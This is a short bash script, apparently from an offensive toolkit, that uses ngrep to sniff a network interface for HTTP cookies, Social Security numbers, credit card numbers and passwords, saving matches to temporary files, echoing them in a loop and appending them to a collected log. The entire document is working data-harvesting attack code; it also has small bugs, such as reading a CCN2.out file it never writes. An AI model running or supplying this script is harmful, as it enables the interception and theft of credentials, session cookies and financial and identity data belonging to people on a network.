#!/bin/bash
# Script for searching the wire for SSNs/CCNs

if [ -e "/tmp/fonIFACE.tmp" ]; then
  iface=`cat /tmp/fonIFACE.tmp`
else
 iface="eth0"
fi

# Capture Cookies
ngrep -q -d $iface -W byline -i 'Cookie:' | tee $PWD/temp/COOKIE.out &
# Capture Social Security Numbers
ngrep -q -d $iface -W single -w '[0-9]{3}\-[0-9]{2}\-[0-9]{4}' | tee $PWD/temp/SSN.out &
# Capture Credit Card Numbers
ngrep -q -d $iface -W single '[0-9]{4}\-[0-9]{4}\-[0-9]{4}\-[0-9]{4}' | tee $PWD/temp/CCN.out &
# Capture Passwords
ngrep -q -d $iface -W single -i 'password' | tee $PWD/temp/PASS.out &

while true; do
  COOKIEs=`cat $PWD/temp/COOKIE.out 2> /dev/null`
  CCNs=`cat $PWD/temp/CCN2.out 2> /dev/null`
  SSNs=`cat $PWD/temp/SSN.out 2> /dev/null`
  PASSs=`cat $PWD/temp/PASS.out 2> /dev/null`
  sleep .5
  echo "[*] Outputting collected potential ngrep information..."
  echo "$CCNs" ; echo
  echo "$SSNs" ; echo
  echo "$PASSs" ; echo
  if [ ! "$CCNs" ] || [ ! "$SSNs" ] || [ ! "$PASSs" ] || [ ! "$COOKIEs" ]; then sleep 10 ; fi
done

# Break out and clean up
killall -9 ngrep 2> /dev/null
NOW=$(date +"%b-%d_%H:%m:%S")
# Store to log and clean up
cat temp/*.out >> ../collected/ngrep_$NOW.log
rm -f temp/*.out 2> /dev/null
